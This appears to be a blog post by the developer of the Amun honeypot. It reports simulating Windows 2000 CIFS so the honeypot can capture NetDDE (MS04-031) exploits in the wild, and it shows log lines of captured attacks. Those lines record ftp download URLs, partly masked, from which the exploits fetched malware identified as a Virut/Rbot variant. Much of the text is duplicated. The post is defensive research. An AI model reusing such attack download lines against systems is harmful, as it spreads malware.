Amun: NetDDE Reloaded
I am currently working on the CIFS simulation of Amun, so requests to vulnerabilities like NetDDE, LSASS, or MS08067 can be correctly answered. first results are promising, although documentation of the protocol is not the best, i managed to simulated a Windows 2000 for the NetDDE vulnerability (MS04031) good enough to finally trigger current exploits in the wild. I also had to add a new shellcode decoder detection pattern in order to recognize the shellcode used in sample exploits available in the internet.
So far i was able to capture two attacks from different hosts against the NetDDE vulnerability:
Unfortunately only one download worked, the second one. The malware has the md5hash 05f9bcf3a7d0ab7b4d4066c095f4c732 and the Anubis Sandbox report can be found here. According to VirusTotal it is an Virut/Rbot variant, which is already well detected by current anti-virus engines.
I have just started to integrate the new CIFS simulation with the MS08067 vulnerability emulation, but i am not yet finished. I will also update the other vulnerability modules that rely on a working simulation rather than random bytes replied with a few bytes set to certain values. There will be a new release of Amun soon, so stay tuned.
So far i was able to capture two attacks from different hosts against the NetDDE vulnerability:
exploit 137.118.xxx.xxx -> xxx.xxx.xxx.xxx:139
(NETDDE Vulnerability: ftp://1:1@137.118.xxx.xxx:5056/['Cilevb.com'])
exploit 72.253.xxx.xxx -> xxx.xxx.xxx.xxx:139
(NETDDE Vulnerability: ftp://1:1@72.253.xxx.xxx:50112/['myreceve.com'])
(NETDDE Vulnerability: ftp://1:1@137.118.xxx.xxx:5056/['Cilevb.com'])
exploit 72.253.xxx.xxx -> xxx.xxx.xxx.xxx:139
(NETDDE Vulnerability: ftp://1:1@72.253.xxx.xxx:50112/['myreceve.com'])
Unfortunately only one download worked, the second one. The malware has the md5hash 05f9bcf3a7d0ab7b4d4066c095f4c732 and the Anubis Sandbox report can be found here. According to VirusTotal it is an Virut/Rbot variant, which is already well detected by current anti-virus engines.
I have just started to integrate the new CIFS simulation with the MS08067 vulnerability emulation, but i am not yet finished. I will also update the other vulnerability modules that rely on a working simulation rather than random bytes replied with a few bytes set to certain values. There will be a new release of Amun soon, so stay tuned.
Comment |
0 Trackbacks